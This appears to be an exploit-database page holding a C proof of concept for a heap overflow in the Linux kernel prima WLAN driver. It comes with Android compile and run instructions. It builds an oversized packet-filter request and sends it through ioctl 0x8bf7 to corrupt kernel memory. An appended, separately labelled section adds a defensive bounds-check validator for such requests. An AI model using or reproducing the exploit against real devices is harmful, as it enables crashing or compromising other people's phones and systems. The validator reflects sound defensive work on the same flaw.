Linux Kernel - prima WLAN Driver Heap Overflow
Source: citypw@gmail.com  Author: R0ck  Published: 2016-01-26
/*
 * Coder: Shawn the R0ck, [citypw@gmail.com]
 * Co-worker: Pray3r, [pray3r.z@gmail.com]
 * Compile:
 * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT  -pie
 * # ./a.out wlan0
 * Boom......shit happens[ as always];-)
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>
 
typedef unsigned char v_U8_t;
#define HDD_MAX_CMP_PER_PACKET_FILTER     5
 
struct PacketFilterParamsCfg {
    v_U8_t protocolLayer;
    v_U8_t cmpFlag;
    v_U8_t dataOffset;
    v_U8_t dataLength;
    v_U8_t compareData[8];
    v_U8_t dataMask[8];
};
 
typedef struct {
    v_U8_t filterAction;
    v_U8_t filterId;
    v_U8_t numParams;
    struct PacketFilterParamsCfg
        paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;
 
int main(int argc, const char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Bad usage\n");
        fprintf(stderr, "Usage: %s ifname\n", argv[0]);
        return -1;
    }
 
    struct iwreq req;
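    /* bounded copy: ifrn_name holds at most IFNAMSIZ bytes */
    strncpy(req.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
    req.ifr_ifrn.ifrn_name[IFNAMSIZ - 1] = '\0';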
    int fd, status, i = 0;
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    tPacketFilterCfg p_req;
 
    /* craft a data structure that triggers the vulnerable code path */
    req.u.data.pointer =
        malloc(sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
    p_req.filterAction = 1;
    p_req.filterId = 0;
    p_req.numParams = 3;
    for (; i < 5; i++) {
        p_req.paramsData[i].dataLength = 241;
        memset(&p_req.paramsData[i].compareData, 0x41, 16);
    }
 
    memcpy(req.u.data.pointer, &p_req,
           sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
 
    if (ioctl(fd, 0x8bf7, &req) == -1) {
        fprintf(stderr, "Failed ioctl() get on interface %s: %s\n",
            argv[1], strerror(errno));
    } else {
        printf("You shouldn't see this msg...\n");
    }
 
}
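
The request above sets dataLength to 241 while compareData[] and dataMask[] hold 8 bytes each. The following is an added example, not code from the original page or from the driver: a bounds check a handler could run on such a request before using it. It assumes the overflow comes from trusting the user-supplied dataLength and numParams fields (the page does not show the driver code); packet_filter_cfg_validate, validate_sample and FILTER_DATA_MAX are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HDD_MAX_CMP_PER_PACKET_FILTER 5
#define FILTER_DATA_MAX 8 /* size of compareData[]/dataMask[] in the PoC's struct */

struct PacketFilterParamsCfg {
    uint8_t protocolLayer;
    uint8_t cmpFlag;
    uint8_t dataOffset;
    uint8_t dataLength;
    uint8_t compareData[FILTER_DATA_MAX];
    uint8_t dataMask[FILTER_DATA_MAX];
};

typedef struct {
    uint8_t filterAction;
    uint8_t filterId;
    uint8_t numParams;
    struct PacketFilterParamsCfg paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg;

/* Hypothetical validator: 0 if the request is safe to process, -1 otherwise.
 * user_len is the number of bytes the caller claims to have supplied. */
int packet_filter_cfg_validate(const tPacketFilterCfg *cfg, size_t user_len)
{
    size_t i;

    if (cfg == NULL || user_len < sizeof(*cfg))
        return -1;                      /* short or missing buffer */
    if (cfg->numParams > HDD_MAX_CMP_PER_PACKET_FILTER)
        return -1;                      /* would index past paramsData[] */
    for (i = 0; i < cfg->numParams; i++) {
        if (cfg->paramsData[i].dataLength > FILTER_DATA_MAX)
            return -1;                  /* would copy past compareData[]/dataMask[] */
    }
    return 0;
}

/* Constructed sample request using the same field layout as the PoC. */
int validate_sample(uint8_t num_params, uint8_t data_length)
{
    tPacketFilterCfg cfg;
    size_t i;

    memset(&cfg, 0, sizeof(cfg));
    cfg.filterAction = 1;
    cfg.numParams = num_params;
    for (i = 0; i < HDD_MAX_CMP_PER_PACKET_FILTER; i++)
        cfg.paramsData[i].dataLength = data_length;
    return packet_filter_cfg_validate(&cfg, sizeof(cfg));
}
```
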
 